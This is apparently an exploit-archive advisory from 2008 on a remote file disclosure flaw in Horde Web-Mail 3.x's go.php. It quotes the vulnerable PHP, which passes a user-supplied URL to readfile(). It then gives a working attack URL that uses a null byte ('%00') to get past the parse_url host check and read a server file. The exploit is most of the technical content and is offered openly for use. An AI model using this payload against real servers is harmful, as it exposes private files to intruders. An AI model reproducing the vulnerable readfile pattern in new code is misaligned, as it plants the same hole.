[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability
# Published : 2008-01-06
# Author : Eugene Minaev
# Previous Title : LoudBlog <= 0.6.1 (parsedpage) Remote Code Execution Vulnerability
# Next Title : CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability
----[ Horde Web-Mail Remote File Disclosure ... ITDefence.ru Antichat.ru ]
Horde Web-Mail Remote File Disclosure
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________
/ . / /_// // / / __ /__/ /
/ / /_// / / / / / /___/
/ / / / / / / / /
/ / / / / / / /__ //
/ ____________/ / / __________// /__ // /
/\ _______/ ________________/____/ 2007 /_//_/ // //
\ // // /
. \ -[ ITDEFENCE.ru Security advisory ]- // // / .
. _\________[________________________________________]_________//_//_/ . .
At first look , this code is not vulnerable and we can only read remote files.
<?php
if (empty($_GET['url'])) {
exit;
}
if (get_magic_quotes_gpc()) {
$url = @parse_url(stripslashes($_GET['url']));
} else {
$url = @parse_url($_GET['url']);
}
.....
if ((!empty($_SERVER['SERVER_NAME']) &&
$_SERVER['SERVER_NAME'] == $url['host']) ||
(!empty($_SERVER['HTTP_HOST']) &&
$_SERVER['HTTP_HOST'] == $url['host'])) {
.....
if (!empty($_GET['untrusted'])) {
readfile($_GET['url']);
exit;
}
?>
But parse_url is only a set of regular expressions and we can use nullbyte to deceive function.
http://test1.ru/horde/util/go.php?untrusted=1&url=test.php%00http://another.host/
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
1st advisory: http://www.securityfocus.com/archive/1/427710/30/0/threaded
# www.Syue.com [2008-01-06]